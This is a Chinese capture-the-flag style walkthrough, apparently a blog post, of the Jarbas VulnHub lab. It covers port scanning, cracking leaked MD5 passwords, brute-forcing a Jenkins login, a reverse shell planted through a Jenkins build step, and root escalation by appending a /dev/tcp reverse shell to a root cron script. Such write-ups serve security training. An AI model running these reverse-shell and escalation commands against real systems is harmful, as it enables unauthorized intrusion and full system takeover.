红队渗透靶场之Jarbas靶场(超详细)

「爱情、让人受尽委屈。」 2023-09-24 14:46 27阅读 0赞

## 靶场考察点 ##

### 1.Jenkis平台的漏洞利用 ###

Jenkins是一个开源软件项目，是基于Java开发的一种持续集成工具，用于监控持续重复的工作，旨在提供一个开放易用的软件平台，使软件项目可以进行持续集成

### 2.contrab提权 ###

在LINUX系统中的`/etc/contrab`文件存放着系统定时任务, 若该文件的某些定时任务指定由root用户执行, 那么这将是一个可提权点

### 3.登录爆破 ###

使用burpsuite对网站后台登录进行爆破

## 靶场搭建 ##

Jarbas靶场下载地址: https://download.vulnhub.com/jarbas/Jarbas.zip

## 渗透步骤 ##

### 信息收集 ###

#### 1.确定靶机ip ####

扫描C段ip的存活主机: `nmap -sn 192.168.47.0/24`, 确定目标主机的IP为192.168.47.156

![image-20221124230218824][]

#### 2.端口扫描 ####

分别使用tcp和udp扫描目标主机的开放端口, 显示开放的端口有`22`、`80`、`3306`、`8080`

nmap -p- 192.168.47.156
    nmap -sU -V -p22,80,3306,8080 192.168.47.156

![image-20221124233435735][]

![image-20221124233440334][]

nmap使用web漏扫脚本进行扫描, 扫描结果并不太理想, 显示在8080端口处有一个robots.txt

nmap --script=vuln -p21,22,80,3306 192.168.47.156

![image-20221124233935822][]

访问robots.txt, 页面信息为"我们不想机器人去点击’建立’连接", 作者不想"build"被点击, 那么这个"build"后续很可能会出现且可利用

![image-20221125090817640][]

访问http://192.168.47.156:8080, 显示登录页面, 可用于后续的爆破

![image-20221125093938352][]

#### 3.目录爆破 ####

对http://192.168.47.156:80进行目录爆破, 爆出access.html

python3 dirsearch.py -u http://192.168.47.156 -x 403

![image-20221125091907048][]

访问http://192.168.47.156:80/access.html, 页面显示三段未加密字符对应MD5加密字符串,依照以往的经验这可能是用户的账号及密码

经过在线网站的破解后, 密码字符串分别为`italia`、`vipsu`、`mariana`, 最终账号对应密码如下所示:

*  tiago- > italia
 *  trindade -> vipus
 *  eder -> mariana

![1][]

![1][1 1]

使用上述的账号密码尝试登录, 全部登录失败, 后续尝试使用burpsuite打乱顺序进行爆破

![1][1 2]

### Web渗透 ###

#### 1.登录爆破 ####

使用burpsuite进行爆破, 攻击类型选择`Clusterbomb`, 爆破参数分别是`j_username`和`j_password`, 爆破的字典填写上述用户的账号密码

![1][1 3]

![1][1 4]

![1][1 5]

从响应长度可判断出`eder/mariana`或`eder/vipsu`都可能为正确的账号密码, 经过登录尝试后, 确定后者才是正确的账号密码

由后台页面可知, 这是一个Jenkins平台, 这就要考察我们对该平台漏洞利用的了解

![image-20221125155317577][]

![image-20221125155433328][]

#### 2.Jenkins远程命令执行反弹shell ####

在Jenkins平台新建一个任务 ![动画][a736dc9e8323c090f88e1763949e59b2.gif]

在构建栏处发现一处能够远程命令执行的地方, 选择`Execute shell`, 随后输入`/bin/bash -i >& /dev/tcp/192.168.47.155/4444 0>&1`, 该命令的作用是反弹目标主机的shell, 然后点击应用加保存

![1][1 6]

![1][1 7]

在kali监听本机的4444端口来接收反弹Shell: `nc -lvp 4444`, 随后点击`立即构建`触发上述设置的远程命令,后续在kali收到反弹的shell

> 通常以这种方式获取的反弹shell, 我们称之为非交互式shell
> 
>  *  交互式shell: shell等待你的输入并且执行你提交的命令, 这种模式也是大多数用户非常熟悉的
>  *  非交互式shell: shell不与你进行交互，而是读取存放在文件中的命令,并且执行它们, 当它读到文件的结尾，shell也就终止了

![1][1 8]

![image-20221125211409283][]

### 系统提权 ###

#### 1.收集当前用户信息 ####

查看当前用户: `whoami`, 显示当前用户为jenkins

![image-20221125221304286][]

查看当前用户权限: sudo -l, 结果显示没有任何权限

![image-20221125221342646][]

#### 2.crontab提权 ####

查看系统定时任务: `cat /etc/crontab`, 发现有一个任务使用root用户执行shell脚本

查看shell脚本的内容: `cat /etc/script/CleaningScript.sh`, 发现这是一个删除日志的脚本

![image-20221125222821487][]

![image-20221125223338183][]

将反弹Shell的命令写入脚本文件, 这样一来就能获取root权限的反弹shell了

echo "/bin/bash -i >& /dev/tcp/192.168.47.155/4444 0>&1" >> /etc/script/CleaningScript.sh

![image-20221125223530489][]

重新建立nc监听, 过5分钟后就能接收到反弹的root权限shell

![image-20221125224814118][]

获取flag.txt

![image-20221126000715869][]

[image-20221124230218824]: https://img-blog.csdnimg.cn/img_convert/47436ce2e20854cc660951973b5d0df7.png
[image-20221124233435735]: https://img-blog.csdnimg.cn/img_convert/cdc88f6715893bed58ac46cf27bfb658.png
[image-20221124233440334]: https://img-blog.csdnimg.cn/img_convert/4f5d92525ce08611e1c260f59110af91.png
[image-20221124233935822]: https://img-blog.csdnimg.cn/img_convert/158e6beb939a5601ee5382d701975cb2.png
[image-20221125090817640]: https://img-blog.csdnimg.cn/img_convert/d99684233eb011cf66c5fcf2b0d92fe8.png
[image-20221125093938352]: https://img-blog.csdnimg.cn/img_convert/b0218715b0fbd79bed99ab623f92acd2.png
[image-20221125091907048]: https://img-blog.csdnimg.cn/img_convert/6096cc4cc81ad0c93f54aec22adb2b29.png
[1]: https://img-blog.csdnimg.cn/img_convert/49804d2d74783e0d62ae9d5fe7ceea05.png
[1 1]: https://img-blog.csdnimg.cn/img_convert/a0ac7e6cc285b53b7ed254e546a8ce93.png
[1 2]: https://img-blog.csdnimg.cn/img_convert/ca487d00f328e492be2cc2fc595d22a2.png
[1 3]: https://img-blog.csdnimg.cn/img_convert/0f7a6d9b873d56e86830e02cea323a2d.png
[1 4]: https://img-blog.csdnimg.cn/img_convert/5769573eae495d3f8e61b0e0918c49f2.png
[1 5]: https://img-blog.csdnimg.cn/img_convert/3cb21679e5ad0a82b228b35337d932d1.png
[image-20221125155317577]: https://img-blog.csdnimg.cn/img_convert/512c9b1870ba1590fb5ea23ac9262362.png
[image-20221125155433328]: https://img-blog.csdnimg.cn/img_convert/7ccd8305970efc448d5995c488ead3c7.png
[a736dc9e8323c090f88e1763949e59b2.gif]: https://img-blog.csdnimg.cn/img_convert/a736dc9e8323c090f88e1763949e59b2.gif
[1 6]: https://img-blog.csdnimg.cn/img_convert/1c608831fa09a7739c1383ce3f9fed17.png
[1 7]: https://img-blog.csdnimg.cn/img_convert/f3b68f3d6d59b9c3cbbb61c4132f71b4.png
[1 8]: https://img-blog.csdnimg.cn/img_convert/a8bcc16e306e8bb407fe61129b8deaad.png
[image-20221125211409283]: https://img-blog.csdnimg.cn/img_convert/325fcfb25404c51357c4e44148b51af4.png
[image-20221125221304286]: https://img-blog.csdnimg.cn/img_convert/0c6625eec192caaf5164dc9322dedeec.png
[image-20221125221342646]: https://img-blog.csdnimg.cn/img_convert/c2a692c61511a38050be446dd2f7ab20.png
[image-20221125222821487]: https://img-blog.csdnimg.cn/img_convert/f9775cba1e7a65d7e4e8bf295e3bdbfa.png
[image-20221125223338183]: https://img-blog.csdnimg.cn/img_convert/e2b8e2b0e2bf44973cb6a84ab40db8ca.png
[image-20221125223530489]: https://img-blog.csdnimg.cn/img_convert/e9f046bf7c6c133f87db2dd1e040d9a7.png
[image-20221125224814118]: https://img-blog.csdnimg.cn/img_convert/ca48f277cbc670d2fae3dde2f6471216.png
[image-20221126000715869]: https://img-blog.csdnimg.cn/img_convert/db3965851ff88fe90d9324903366d140.png